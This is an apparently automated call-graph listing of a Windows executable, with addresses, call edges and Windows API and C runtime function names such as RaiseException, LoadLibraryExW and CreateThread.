bb1b12 19394->19396 19395->18969 19396->19395 19398 bb1abd 19396->19398 19399 bb1acd 19398->19399 19401 bb1ad4 __InternalCxxFrameHandler 19398->19401 19401->19396 19402 bb71f4 19403 bb720b 19402->19403 19406 bb723a 19403->19406 19408 bb2434 WriteFile 19403->19408 19405 bb7259 19406->19405 19407 bb225e GetLastError 19406->19407 19407->19405 19408->19403 19409 bc092c 19410 bd0548 ___vcrt_freefls@4 14 API calls 19409->19410 19411 bc0935 19410->19411 19412 bc028f 19415 bc02ae 19412->19415 19414 bc0297 19416 bc030c 19415->19416 19417 bc0307 19415->19417 19416->19414 19419 bc0b04 19417->19419 19420 bc0b0e 19419->19420 19422 bc0b22 19420->19422 19423 bc4bad 19420->19423 19422->19416 19424 bc4bc2 19423->19424 19425 bc3d65 4 API calls 19424->19425 19426 bc4bd8 DeleteCriticalSection 19424->19426 19425->19424 19426->19422 19428 bb8bac 19429 bb8c13 19428->19429 19436 bb9333 19429->19436 19432 bb8c4f 19434 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19432->19434 19435 bb8cff 19434->19435 19437 bb9350 19436->19437 19443 bb6f6f 6 API calls 19437->19443 19438 bb936e 19439 bb8c49 19438->19439 19444 bb6f6f 6 API calls 19438->19444 19439->19432 19446 bbb4f5 19439->19446 19440 bb9382 19440->19439 19445 bb6f6f 6 API calls 19440->19445 19441 bb9395 19441->19439 19453 bb9183 19441->19453 19443->19438 19444->19440 19445->19441 19447 bbb501 __EH_prolog3_catch 19446->19447 19473 bbb085 19447->19473 19449 bbb510 19450 bb8ebb RaiseException 19449->19450 19451 bbb524 19449->19451 19452 bbb556 19450->19452 19451->19432 19452->19432 19454 bb918f 19453->19454 19463 bbd921 19454->19463 19456 bb91a9 19457 bb91ca 19456->19457 19458 bcc081 16 API calls 19456->19458 19457->19439 19459 bb91ef __InternalCxxFrameHandler 19458->19459 19459->19457 19460 bb92de __InternalCxxFrameHandler 19459->19460 19467 bb6ea6 19459->19467 19462 bb6f6f 6 API calls 19460->19462 19462->19457 19464 bbd934 19463->19464 19465 bbd962 19464->19465 19466 bb6ea6 2 API calls 19464->19466 19465->19456 19466->19464 19472 bb2407 ReadFile 19467->19472 19469 bb6eca 19470 bb6ede GetLastError 19469->19470 19471 bb6eda 19469->19471 19470->19471 19471->19459 19472->19469 19474 bbb091 19473->19474 19497 bbb153 19474->19497 19501 bb6f6f 6 API calls 19474->19501 19475 bbb218 19476 bcc081 16 API calls 19475->19476 19475->19497 19477 bbb22d 19476->19477 19478 bbd921 2 API calls 19477->19478 19479 bbb249 19478->19479 19480 bbb4ef 19479->19480 19479->19497 19502 bb8f15 19479->19502 19481 bb8eb6 RaiseException 19480->19481 19485 bbb4f4 __EH_prolog3_catch 19481->19485 19483 bbb2ab 19484 bb90dc RaiseException 19483->19484 19490 bbb2c4 19484->19490 19486 bbb085 64 API calls 19485->19486 19487 bbb510 19486->19487 19492 bb8ebb RaiseException 19487->19492 19493 bbb524 19487->19493 19488 bbb448 19531 bba886 19488->19531 19490->19480 19490->19488 19517 bba5ba 19490->19517 19499 bbb556 19492->19499 19493->19449 19494 bb8f15 RaiseException 19496 bbb42d 19494->19496 19495 bbb302 19495->19480 19495->19494 19495->19497 19498 bb90dc RaiseException 19496->19498 19497->19449 19500 bbb435 19498->19500 19499->19449 19500->19480 19500->19488 19501->19475 19503 bb8f1e 19502->19503 19504 bb8f2c 19503->19504 19505 bb8eb6 RaiseException 19503->19505 19504->19483 19506 bb8f63 19505->19506 19507 bb8fb3 RaiseException 19506->19507 19508 bb8f7a 19507->19508 19509 bb8fa7 19508->19509 19510 bb8fad 19508->19510 19511 bb911d RaiseException 19508->19511 19509->19483 19512 bb8eb6 RaiseException 19510->19512 19514 bb8f8e 19511->19514 19513 bb8fb2 19512->19513 19514->19510 19515 bb8f93 19514->19515 19516 bb8f15 RaiseException 19515->19516 19516->19509 19518 bba5f4 19517->19518 19585 bba2e2 19518->19585 19520 bb1d74 16 API calls 19526 bba62e 19520->19526 19521 bcc0bb 16 API calls 19521->19526 19522 bba80d 19523 bb8ebb RaiseException 19522->19523 19525 bba812 19523->19525 19524 bb3e6b 16 API calls 19524->19526 19527 bb8eb6 RaiseException 19525->19527 19526->19520 19526->19521 19526->19522 19526->19524 19526->19525 19529 bba774 19526->19529 19530 bbcb09 62 API calls 19526->19530 19528 bba817 19527->19528 19528->19495 19529->19495 19530->19526 19532 bb90dc RaiseException 19531->19532 19533 bba8c0 19532->19533 19534 bba8e2 19533->19534 19732 bb93c7 19533->19732 19535 bba982 19534->19535 19538 bba5ba 62 API calls 19534->19538 19536 bba9e8 19535->19536 19542 bba2e2 16 API calls 19535->19542 19545 bb911d RaiseException 19536->19545 19579 bbadfc 19536->19579 19541 bba92e 19538->19541 19546 bb90dc RaiseException 19541->19546 19563 bba935 19541->19563 19544 bba9cf 19542->19544 19543 bb90dc RaiseException 19543->19534 19547 bb90dc RaiseException 19544->19547 19548 bbaa0a 19545->19548 19546->19535 19547->19536 19549 bb78aa 16 API calls 19548->19549 19550 bbaa1f 19549->19550 19551 bb78aa 16 API calls 19550->19551 19552 bbaa2f 19551->19552 19553 bbaa49 19552->19553 19555 bb78aa 16 API calls 19552->19555 19554 bb90dc RaiseException 19553->19554 19584 bbaa75 19554->19584 19555->19553 19556 bbadb0 19557 bb90dc RaiseException 19556->19557 19558 bbadb8 19557->19558 19559 bbaf85 19558->19559 19568 bbadcf 19558->19568 19561 bb8ebb RaiseException 19559->19561 19560 bbaf8f 19562 bb8eb6 RaiseException 19560->19562 19564 bbaf8a 19561->19564 19565 bbaf94 19562->19565 19563->19497 19567 bb8eb6 RaiseException 19564->19567 19566 bb8f15 RaiseException 19566->19584 19567->19560 19569 bbadf1 19568->19569 19571 bbb6cd 16 API calls 19568->19571 19770 bbb594 19569->19770 19571->19569 19572 bb90dc RaiseException 19572->19584 19573 bba491 16 API calls 19573->19584 19574 bba448 16 API calls 19574->19584 19576 bb8f64 RaiseException 19576->19584 19577 bb3e6b 16 API calls 19577->19584 19578 bb8fb3 RaiseException 19578->19584 19778 bbafc6 19579->19778 19580 bb78aa 16 API calls 19580->19584 19582 bb8fcb RaiseException 19582->19584 19583 bbb5f9 16 API calls 19583->19584 19584->19556 19584->19560 19584->19564 19584->19566 19584->19572 19584->19573 19584->19574 19584->19576 19584->19577 19584->19578 19584->19580 19584->19582 19584->19583 19737 bb9797 19584->19737 19759 bba4d9 19584->19759 19586 bb90dc RaiseException 19585->19586 19587 bba2f8 19586->19587 19588 bba370 19587->19588 19589 bb90dc RaiseException 19587->19589 19591 bba396 19588->19591 19610 bb991c 19588->19610 19607 bba313 19589->19607 19601 bba3ba 19591->19601 19627 bbb626 19591->19627 19592 bba3ef 19686 bbb5f9 19592->19686 19593 bba3d5 19631 bb9ede 19593->19631 19596 bba3eb 19602 bb8eb6 RaiseException 19596->19602 19608 bba439 19596->19608 19600 bba3fd 19600->19596 19690 bb78aa 19600->19690 19601->19592 19601->19593 19603 bba447 19602->19603 19604 bba3e3 19605 bb90dc RaiseException 19604->19605 19605->19596 19607->19596 19609 bb90dc RaiseException 19607->19609 19608->19526 19609->19588 19611 bb9928 19610->19611 19612 bb911d RaiseException 19611->19612 19613 bb993f 19612->19613 19693 bb8f64 19613->19693 19616 bbb5f9 16 API calls 19617 bb997a 19616->19617 19618 bcc081 16 API calls 19617->19618 19619 bb998f 19618->19619 19620 bbb5f9 16 API calls 19619->19620 19621 bb99a1 19620->19621 19622 bbb5f9 16 API calls 19621->19622 19624 bb99af __InternalCxxFrameHandler 19622->19624 19623 bb8fb3 RaiseException 19623->19624 19624->19623 19626 bb911d RaiseException 19624->19626 19705 bb7952 19624->19705 19626->19624 19628 bbb630 19627->19628 19629 bcc081 16 API calls 19628->19629 19630 bbb64b 19629->19630 19630->19601 19632 bb9eea 19631->19632 19633 bbb5f9 16 API calls 19632->19633 19638 bb9efd 19633->19638 19634 bb90dc RaiseException 19634->19638 19635 bb9f6e 19636 bba140 19635->19636 19640 bb9f82 19635->19640 19639 bba14d 19636->19639 19654 bba05a 19636->19654 19637 bb911d RaiseException 19637->19638 19638->19634 19638->19635 19638->19637 19713 bb8e52 19638->19713 19645 bb78aa 16 API calls 19639->19645 19646 bba189 19639->19646 19642 bba04f 19640->19642 19650 bb90dc RaiseException 19640->19650 19658 bb78aa 16 API calls 19640->19658 19644 bb90dc RaiseException 19642->19644 19643 bba236 19648 bbb6cd 16 API calls 19643->19648 19652 bba25e 19643->19652 19644->19654 19645->19639 19646->19604 19647 bb8e52 RaiseException 19647->19654 19651 bba250 19648->19651 19650->19640 19655 bbb787 16 API calls 19651->19655 19652->19604 19653 bb90dc RaiseException 19653->19654 19654->19643 19654->19647 19654->19653 19656 bbb6cd 16 API calls 19654->19656 19657 bbb787 16 API calls 19654->19657 19659 bba2dc 19654->19659 19719 bba491 19654->19719 19655->19652 19656->19654 19657->19654 19658->19640 19660 bb8eb6 RaiseException 19659->19660 19661 bba2e1 19660->19661 19662 bb90dc RaiseException 19661->19662 19663 bba2f8 19662->19663 19664 bba370 19663->19664 19666 bb90dc RaiseException 19663->19666 19665 bba396 19664->19665 19668 bb991c 16 API calls 19664->19668 19667 bba3ba 19665->19667 19674 bbb626 16 API calls 19665->19674 19681 bba313 19666->19681 19669 bba3ef 19667->19669 19670 bba3d5 19667->19670 19671 bba38e 19668->19671 19672 bbb5f9 16 API calls 19669->19672 19675 bb9ede 16 API calls 19670->19675 19676 bb90dc RaiseException 19671->19676 19677 bba3fd 19672->19677 19673 bba3eb 19678 bb8eb6 RaiseException 19673->19678 19684 bba439 19673->19684 19674->19667 19680 bba3e3 19675->19680 19676->19665 19677->19673 19683 bb78aa 16 API calls 19677->19683 19679 bba447 19678->19679 19682 bb90dc RaiseException 19680->19682 19681->19673 19685 bb90dc RaiseException 19681->19685 19682->19673 19683->19677 19684->19604 19685->19664 19687 bbb603 19686->19687 19688 bcc081 16 API calls 19687->19688 19689 bbb61e 19688->19689 19689->19600 19691 bb7952 16 API calls 19690->19691 19692 bb78b3 19691->19692 19692->19600 19694 bb8f6e 19693->19694 19695 bb8fb3 RaiseException 19694->19695 19696 bb8f7a 19695->19696 19697 bb8fa7 19696->19697 19698 bb8fad 19696->19698 19699 bb911d RaiseException 19696->19699 19697->19616 19700 bb8eb6 RaiseException 19698->19700 19702 bb8f8e 19699->19702 19701 bb8fb2 19700->19701 19702->19698 19703 bb8f93 19702->19703 19704 bb8f15 RaiseException 19703->19704 19704->19697 19706 bb7961 19705->19706 19712 bb7991 __InternalCxxFrameHandler 19705->19712 19707 bb79bc 19706->19707 19708 bb796c 19706->19708 19709 bceddc CallUnexpected RaiseException 19707->19709 19710 bcc081 16 API calls 19708->19710 19711 bb79d1 19709->19711 19710->19712 19712->19624 19714 bb90dc RaiseException 19713->19714 19715 bb8e5f 19714->19715 19716 bb8e71 19715->19716 19717 bb8eb6 RaiseException 19715->19717 19716->19638 19718 bb8e7f 19717->19718 19720 bb8fb3 RaiseException 19719->19720 19721 bba49f 19720->19721 19722 bba4a3 19721->19722 19723 bba4b2 19721->19723 19727 bba448 19722->19727 19725 bbb6cd 16 API calls 19723->19725 19726 bba4b0 IsInExceptionSpec 19725->19726 19726->19654 19728 bbb6cd 16 API calls 19727->19728 19730 bba45c 19728->19730 19729 bba48b 19729->19726 19730->19729 19731 bb8fb3 RaiseException 19730->19731 19731->19730 19733 bb93d3 19732->19733 19734 bb90dc RaiseException 19733->19734 19735 bb93e6 19733->19735 19736 bb8e52 RaiseException 19733->19736 19734->19733 19735->19543 19736->19733 19738 bbb787 16 API calls 19737->19738 19740 bb97b0 19738->19740 19739 bb97ed 19739->19584 19740->19739 19741 bb8eb6 RaiseException 19740->19741 19742 bb97fa 19741->19742 19743 bb911d RaiseException 19742->19743 19744 bb9811 19743->19744 19745 bbb626 16 API calls 19744->19745 19750 bb9832 19745->19750 19746 bb988e 19747 bb90dc RaiseException 19746->19747 19758 bb98a2 19747->19758 19748 bb90dc RaiseException 19748->19750 19749 bb990e 19749->19584 19750->19746 19750->19748 19751 bb9916 19750->19751 19752 bb8eb6 RaiseException 19751->19752 19755 bb991b 19752->19755 19753 bb8e52 RaiseException 19753->19758 19754 bba491 16 API calls 19754->19758 19756 bb90dc RaiseException 19756->19758 19757 bb9797 16 API calls 19757->19758 19758->19749 19758->19753 19758->19754 19758->19756 19758->19757 19760 bba4e5 19759->19760 19761 bba491 16 API calls 19760->19761 19762 bba4f6 19761->19762 19763 bb8f64 RaiseException 19762->19763 19764 bba50b 19763->19764 19765 bbb722 16 API calls 19764->19765 19767 bba516 19765->19767 19766 bba573 19766->19584 19767->19766 19768 bb8eb6 RaiseException 19767->19768 19769 bba5b9 19768->19769 19771 bbb5a7 19770->19771 19777 bbb5d3 19770->19777 19772 bbb5af 19771->19772 19773 bbb5e3 19771->19773 19776 bcc081 16 API calls 19772->19776 19774 bceddc CallUnexpected RaiseException 19773->19774 19775 bbb5f8 19774->19775 19776->19777 19777->19579 19779 bbb5f9 16 API calls 19778->19779 19780 bbafdd 19779->19780 19781 bbb5f9 16 API calls 19780->19781 19783 bbafed 19781->19783 19782 bbb052 19782->19563 19783->19782 19784 bb8eb6 RaiseException 19783->19784 19786 bbb084 19784->19786 19785 bbb153 19785->19563 19786->19785 19812 bb6f6f 6 API calls 19786->19812 19787 bbb218 19787->19785 19788 bcc081 16 API calls 19787->19788 19789 bbb22d 19788->19789 19790 bbd921 2 API calls 19789->19790 19791 bbb249 19790->19791 19791->19785 19792 bbb4ef 19791->19792 19794 bb8f15 RaiseException 19791->19794 19793 bb8eb6 RaiseException 19792->19793 19797 bbb4f4 __EH_prolog3_catch 19793->19797 19795 bbb2ab 19794->19795 19796 bb90dc RaiseException 19795->19796 19802 bbb2c4 19796->19802 19798 bbb085 64 API calls 19797->19798 19799 bbb510 19798->19799 19804 bb8ebb RaiseException 19799->19804 19805 bbb524 19799->19805 19800 bbb448 19801 bba886 64 API calls 19800->19801 19801->19785 19802->19792 19802->19800 19803 bba5ba 62 API calls 19802->19803 19807 bbb302 19803->19807 19810 bbb556 19804->19810 19805->19563 19806 bb8f15 RaiseException 19808 bbb42d 19806->19808 19807->19785 19807->19792 19807->19806 19809 bb90dc RaiseException 19808->19809 19811 bbb435 19809->19811 19810->19563 19811->19792 19811->19800 19812->19787 19813 bc0945 19814 bc094c VirtualFree 19813->19814 19815 bc095d 19813->19815 19814->19815 19816 bcc347 19817 bcc353 CallCatchBlock 19816->19817 19844 bcc6ab 19817->19844 19819 bcc35a 19820 bcc4ad 19819->19820 19829 bcc384 ___scrt_is_nonwritable_in_current_image IsInExceptionSpec ___scrt_release_startup_lock 19819->19829 20005 bcc996 IsProcessorFeaturePresent 19820->20005 19822 bcc4b4 19988 bd1092 19822->19988 19825 bd1056 IsInExceptionSpec 23 API calls 19826 bcc4c2 19825->19826 19827 bcc3a3 19828 bcc424 19852 bccab1 19828->19852 19829->19827 19829->19828 19991 bd106c 19829->19991 19845 bcc6b4 19844->19845 20009 bccbec IsProcessorFeaturePresent 19845->20009 19849 bcc6c5 19851 bcc6c9 19849->19851 20019 bcee67 19849->20019 19851->19819 20081 bcec00 19852->20081 19855 bcc42a 19856 bd0d2d 19855->19856 20083 bd3758 19856->20083 19858 bd0d36 19859 bcc432 19858->19859 20089 bd3a7e 19858->20089 19861 bcb658 19859->19861 20415 bd91a9 19861->20415 19863 bcb667 GetVersionExA 19864 bcb68d 19863->19864 20416 bb4473 GetVersionExA 19864->20416 19867 bb16b8 16 API calls 19868 bcb6c9 19867->19868 19869 bb16b8 16 API calls 19868->19869 19870 bcb6d4 19869->19870 19871 bb16b8 16 API calls 19870->19871 19872 bcb6df 19871->19872 19873 bb16b8 16 API calls 19872->19873 19874 bcb6ea GetCommandLineW 19873->19874 19875 bb16dc 16 API calls 19874->19875 19876 bcb6fc 19875->19876 20428 bb1c55 19876->20428 19878 bcb714 19879 bb16b8 16 API calls 19878->19879 19880 bcb72b 19879->19880 20434 bb207d 19880->20434 19882 bcb736 19883 bb1787 16 API calls 19882->19883 19885 bcb7c7 19882->19885 19883->19885 19884 bb1716 16 API calls 19886 bcb7ea 19884->19886 19885->19884 19989 bd0f2d IsInExceptionSpec 23 API calls 19988->19989 19990 bcc4ba 19989->19990 19990->19825 19992 bd1082 __dosmaperr 19991->19992 19995 bd0606 CallCatchBlock 19991->19995 19992->19828 19993 bd1f74 _unexpected 37 API calls 19993->19995 19994 bd1739 IsInExceptionSpec 37 API calls 19994->19995 19995->19991 19995->19993 19995->19994 20006 bcc9ac IsInExceptionSpec 20005->20006 20007 bcca57 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20006->20007 20008 bccaa2 IsInExceptionSpec 20007->20008 20008->19822 20010 bcc6c0 20009->20010 20011 bcee48 20010->20011 20025 bcfee7 20011->20025 20014 bcee51 20014->19849 20016 bcee59 20017 bcee64 20016->20017 20039 bcff23 20016->20039 20017->19849 20020 bcee7a 20019->20020 20021 bcee70 20019->20021 20020->19851 20022 bcefa9 ___vcrt_uninitialize_ptd 6 API calls 20021->20022 20023 bcee75 20022->20023 20024 bcff23 ___vcrt_uninitialize_locks DeleteCriticalSection 20023->20024 20024->20020 20027 bcfef0 20025->20027 20028 bcff19 20027->20028 20029 bcee4d 20027->20029 20043 bd0124 20027->20043 20030 bcff23 ___vcrt_uninitialize_locks DeleteCriticalSection 20028->20030 20029->20014 20031 bcef76 20029->20031 20030->20029 20062 bd0035 20031->20062 20034 bcef8b 20034->20016 20037 bcefa6 20037->20016 20040 bcff2e 20039->20040 20042 bcff4d 20039->20042 20041 bcff38 DeleteCriticalSection 20040->20041 20041->20041 20041->20042 20042->20014 20048 bcffec 20043->20048 20046 bd015c InitializeCriticalSectionAndSpinCount 20047 bd0147 20046->20047 20047->20027 20049 bd0027 20048->20049 20050 bd0004 20048->20050 20049->20046 20049->20047 20050->20049 20054 bcff52 20050->20054 20053 bd0019 GetProcAddress 20053->20049 20060 bcff5e ___vcrt_FlsGetValue 20054->20060 20055 bcffd2 20055->20049 20055->20053 20056 bcff74 LoadLibraryExW 20057 bcffd9 20056->20057 20058 bcff92 GetLastError 20056->20058 20057->20055 20059 bcffe1 FreeLibrary 20057->20059 20058->20060 20059->20055 20060->20055 20060->20056 20061 bcffb4 LoadLibraryExW 20060->20061 20061->20057 20061->20060 20063 bcffec ___vcrt_FlsGetValue 5 API calls 20062->20063 20064 bd004f 20063->20064 20065 bd0068 TlsAlloc 20064->20065 20066 bcef80 20064->20066 20066->20034 20067 bd00e6 20066->20067 20068 bcffec ___vcrt_FlsGetValue 5 API calls 20067->20068 20069 bd0100 20068->20069 20070 bd011b TlsSetValue 20069->20070 20071 bcef99 20069->20071 20070->20071 20071->20037 20072 bcefa9 20071->20072 20073 bcefb3 20072->20073 20075 bcefb9 20072->20075 20076 bd0070 20073->20076 20075->20034 20077 bcffec ___vcrt_FlsGetValue 5 API calls 20076->20077 20078 bd008a 20077->20078 20079 bd00a2 TlsFree 20078->20079 20080 bd0096 20078->20080 20079->20080 20080->20075 20082 bccac4 GetStartupInfoW 20081->20082 20082->19855 20084 bd3793 20083->20084 20085 bd3761 20083->20085 20084->19858 20092 bd2031 20085->20092 20412 bd3a27 20089->20412 20093 bd203c 20092->20093 20094 bd2042 20092->20094 20095 bd247b __dosmaperr 6 API calls 20093->20095 20096 bd24ba __dosmaperr 6 API calls 20094->20096 20114 bd2048 20094->20114 20095->20094 20097 bd205c 20096->20097 20099 bd1b9e __dosmaperr 14 API calls 20097->20099 20097->20114 20098 bd1739 IsInExceptionSpec 37 API calls 20100 bd20ca 20098->20100 20101 bd206c 20099->20101 20102 bd2089 20101->20102 20103 bd2074 20101->20103 20105 bd24ba __dosmaperr 6 API calls 20102->20105 20106 bd24ba __dosmaperr 6 API calls 20103->20106 20104 bd20c1 20117 bd35a4 20104->20117 20107 bd2095 20105->20107 20108 bd2080 20106->20108 20109 bd2099 20107->20109 20110 bd20a8 20107->20110 20111 bd1bfb _free 14 API calls 20108->20111 20112 bd24ba __dosmaperr 6 API calls 20109->20112 20113 bd1da1 __dosmaperr 14 API calls 20110->20113 20111->20114 20112->20108 20115 bd20b3 20113->20115 20114->20098 20114->20104 20116 bd1bfb _free 14 API calls 20115->20116 20116->20114 20136 bd36b8 20117->20136 20122 bd35d0 20122->20084 20127 bd1bfb _free 14 API calls 20129 bd3621 20127->20129 20128 bd360e 20130 bd1b8b _free 14 API calls 20128->20130 20129->20084 20135 bd3613 20130->20135 20131 bd3655 20131->20135 20172 bd3240 20131->20172 20132 bd3629 20132->20131 20133 bd1bfb _free 14 API calls 20132->20133 20133->20131 20135->20127 20137 bd36c4 CallCatchBlock 20136->20137 20145 bd36de 20137->20145 20180 bd280c EnterCriticalSection 20137->20180 20139 bd35b7 20147 bd334e 20139->20147 20140 bd371a 20181 bd3737 20140->20181 20141 bd36ee 20141->20140 20146 bd1bfb _free 14 API calls 20141->20146 20143 bd1739 IsInExceptionSpec 37 API calls 20144 bd3757 20143->20144 20145->20139 20145->20143 20146->20140 20185 bd17e2 20147->20185 20150 bd336f GetOEMCP 20153 bd3398 20150->20153 20151 bd3381 20152 bd3386 GetACP 20151->20152 20151->20153 20152->20153 20153->20122 20154 bd277d 20153->20154 20155 bd27bb 20154->20155 20159 bd278b __dosmaperr 20154->20159 20156 bd1b8b _free 14 API calls 20155->20156 20158 bd27b9 20156->20158 20157 bd27a6 RtlAllocateHeap 20157->20158 20157->20159 20158->20135 20161 bd37b3 20158->20161 20159->20155 20159->20157 20160 bd057d __dosmaperr 2 API calls 20159->20160 20160->20159 20162 bd334e 39 API calls 20161->20162 20163 bd37d3 20162->20163 20165 bd380d IsValidCodePage 20163->20165 20169 bd3849 IsInExceptionSpec 20163->20169 20164 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20166 bd3606 20164->20166 20167 bd381f 20165->20167 20165->20169 20166->20128 20166->20132 20168 bd384e GetCPInfo 20167->20168 20171 bd3828 IsInExceptionSpec 20167->20171 20168->20169 20168->20171 20169->20164 20302 bd3424 20171->20302 20173 bd324c CallCatchBlock 20172->20173 20386 bd280c EnterCriticalSection 20173->20386 20175 bd3256 20387 bd328d 20175->20387 20180->20141 20184 bd2854 LeaveCriticalSection 20181->20184 20183 bd373e 20183->20145 20184->20183 20186 bd17f9 20185->20186 20187 bd1802 20185->20187 20186->20150 20186->20151 20187->20186 20188 bd1f74 _unexpected 37 API calls 20187->20188 20189 bd1822 20188->20189 20193 bd5634 20189->20193 20194 bd1838 20193->20194 20195 bd5647 20193->20195 20197 bd5661 20194->20197 20195->20194 20201 bd47cb 20195->20201 20198 bd5674 20197->20198 20200 bd5689 20197->20200 20198->20200 20297 bd37a0 20198->20297 20200->20186 20202 bd47d7 CallCatchBlock 20201->20202 20203 bd1f74 _unexpected 37 API calls 20202->20203 20204 bd47e0 20203->20204 20205 bd4826 20204->20205 20214 bd280c EnterCriticalSection 20204->20214 20205->20194 20207 bd47fe 20215 bd484c 20207->20215 20212 bd1739 IsInExceptionSpec 37 API calls 20213 bd484b 20212->20213 20214->20207 20216 bd480f 20215->20216 20217 bd485a __dosmaperr 20215->20217 20219 bd482b 20216->20219 20217->20216 20222 bd457f 20217->20222 20296 bd2854 LeaveCriticalSection 20219->20296 20221 bd4822 20221->20205 20221->20212 20223 bd4595 20222->20223 20225 bd45ff 20222->20225 20223->20225 20230 bd45c8 20223->20230 20233 bd1bfb _free 14 API calls 20223->20233 20226 bd1bfb _free 14 API calls 20225->20226 20249 bd464d 20225->20249 20227 bd4621 20226->20227 20228 bd1bfb _free 14 API calls 20227->20228 20231 bd4634 20228->20231 20229 bd45ea 20232 bd1bfb _free 14 API calls 20229->20232 20230->20229 20235 bd1bfb _free 14 API calls 20230->20235 20234 bd1bfb _free 14 API calls 20231->20234 20236 bd45f4 20232->20236 20238 bd45bd 20233->20238 20239 bd4642 20234->20239 20240 bd45df 20235->20240 20241 bd1bfb _free 14 API calls 20236->20241 20237 bd46bb 20242 bd1bfb _free 14 API calls 20237->20242 20250 bd4138 20238->20250 20245 bd1bfb _free 14 API calls 20239->20245 20278 bd4236 20240->20278 20241->20225 20248 bd46c1 20242->20248 20244 bd465b 20244->20237 20247 bd1bfb 14 API calls _free 20244->20247 20245->20249 20247->20244 20248->20216 20290 bd46f0 20249->20290 20251 bd4149 20250->20251 20277 bd4232 20250->20277 20252 bd415a 20251->20252 20253 bd1bfb _free 14 API calls 20251->20253 20254 bd416c 20252->20254 20256 bd1bfb _free 14 API calls 20252->20256 20253->20252 20255 bd417e 20254->20255 20257 bd1bfb _free 14 API calls 20254->20257 20258 bd4190 20255->20258 20259 bd1bfb _free 14 API calls 20255->20259 20256->20254 20257->20255 20260 bd41a2 20258->20260 20261 bd1bfb _free 14 API calls 20258->20261 20259->20258 20262 bd41b4 20260->20262 20264 bd1bfb _free 14 API calls 20260->20264 20261->20260 20263 bd41c6 20262->20263 20265 bd1bfb _free 14 API calls 20262->20265 20266 bd41d8 20263->20266 20267 bd1bfb _free 14 API calls 20263->20267 20264->20262 20265->20263 20267->20266 20277->20230 20279 bd4243 20278->20279 20289 bd429b 20278->20289 20280 bd4253 20279->20280 20281 bd1bfb _free 14 API calls 20279->20281 20282 bd1bfb _free 14 API calls 20280->20282 20284 bd4265 20280->20284 20281->20280 20282->20284 20283 bd1bfb _free 14 API calls 20285 bd4277 20283->20285 20284->20283 20284->20285 20286 bd1bfb _free 14 API calls 20285->20286 20287 bd4289 20285->20287 20286->20287 20288 bd1bfb _free 14 API calls 20287->20288 20287->20289 20288->20289 20289->20229 20291 bd46fd 20290->20291 20292 bd471c 20290->20292 20291->20292 20293 bd42d7 __dosmaperr 14 API calls 20291->20293 20292->20244 20294 bd4716 20293->20294 20295 bd1bfb _free 14 API calls 20294->20295 20295->20292 20296->20221 20298 bd1f74 _unexpected 37 API calls 20297->20298 20299 bd37aa 20298->20299 20300 bd36b8 __fassign 37 API calls 20299->20300 20301 bd37b0 20300->20301 20301->20200 20303 bd344c GetCPInfo 20302->20303 20312 bd3515 20302->20312 20309 bd3464 20303->20309 20303->20312 20304 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20306 bd35a2 20304->20306 20306->20169 20313 bd43df 20309->20313 20312->20304 20314 bd17e2 __fassign 37 API calls 20313->20314 20315 bd43ff 20314->20315 20333 bd3aaf 20315->20333 20317 bd44bd 20318 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20317->20318 20320 bd34cc 20318->20320 20319 bd442c 20319->20317 20322 bd277d 15 API calls 20319->20322 20324 bd4452 IsInExceptionSpec 20319->20324 20328 bd5fbe 20320->20328 20321 bd44b7 20336 bd44e2 20321->20336 20322->20324 20324->20321 20325 bd3aaf __fassign MultiByteToWideChar 20324->20325 20326 bd44a0 20325->20326 20326->20321 20327 bd44a7 GetStringTypeW 20326->20327 20327->20321 20329 bd17e2 __fassign 37 API calls 20328->20329 20335 bd3ac0 MultiByteToWideChar 20333->20335 20335->20319 20337 bd44ee 20336->20337 20339 bd44ff 20336->20339 20338 bd1bfb _free 14 API calls 20337->20338 20337->20339 20338->20339 20339->20317 20386->20175 20397 bd39a6 20387->20397 20389 bd32af 20390 bd39a6 25 API calls 20389->20390 20391 bd32ce 20390->20391 20392 bd1bfb _free 14 API calls 20391->20392 20393 bd3263 20391->20393 20392->20393 20398 bd39b7 20397->20398 20407 bd39b3 __InternalCxxFrameHandler 20397->20407 20399 bd39be 20398->20399 20400 bd39d1 IsInExceptionSpec 20398->20400 20401 bd1b8b _free 14 API calls 20399->20401 20404 bd39ff 20400->20404 20405 bd3a08 20400->20405 20400->20407 20402 bd39c3 20401->20402 20403 bd1ace ___std_exception_copy 25 API calls 20402->20403 20403->20407 20406 bd1b8b _free 14 API calls 20404->20406 20405->20407 20409 bd1b8b _free 14 API calls 20405->20409 20408 bd3a04 20406->20408 20407->20389 20410 bd1ace ___std_exception_copy 25 API calls 20408->20410 20409->20408 20410->20407 20413 bd17e2 __fassign 37 API calls 20412->20413 20414 bd3a3b 20413->20414 20414->19858 20415->19863 20417 bb44af GetModuleHandleA GetProcAddress 20416->20417 20418 bb44a3 20416->20418 20419 bb44d9 GetSystemDirectoryW 20417->20419 20422 bb44ca 20417->20422 20418->20417 20418->20419 20420 bb44ec 20419->20420 20425 bb4557 20419->20425 20423 bb44f3 lstrlenW 20420->20423 20420->20425 20421 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20424 bb4566 CreateThread 20421->20424 20422->20419 20422->20425 20426 bb4507 20423->20426 20424->19867 20728 bc6c19 20424->20728 20425->20421 20426->20425 20426->20426 20427 bb4535 lstrcatW LoadLibraryExW 20426->20427 20427->20425 20427->20426 20429 bb1cab 20428->20429 20431 bb1c7d 20428->20431 20429->19878 20430 bb1cad 20432 bb1787 16 API calls 20430->20432 20431->20429 20431->20430 20433 bb12c1 16 API calls 20431->20433 20432->20429 20433->20431 20435 bb208c __EH_prolog3_GS 20434->20435 20436 bb20f8 GetModuleFileNameW 20435->20436 20437 bb20ac GetModuleFileNameA 20435->20437 20438 bb20f4 20436->20438 20439 bb2116 20436->20439 20437->20438 20440 bb20c7 20437->20440 20442 bd9167 5 API calls 20438->20442 20439->20438 20441 bb1787 16 API calls 20439->20441 20440->20438 20443 bb1bf7 20 API calls 20440->20443 20447 bb20e8 20441->20447 20444 bb2131 20442->20444 20445 bb20dc 20443->20445 20444->19882 20446 bb17ef 16 API calls 20445->20446 20446->20447 20447->20438 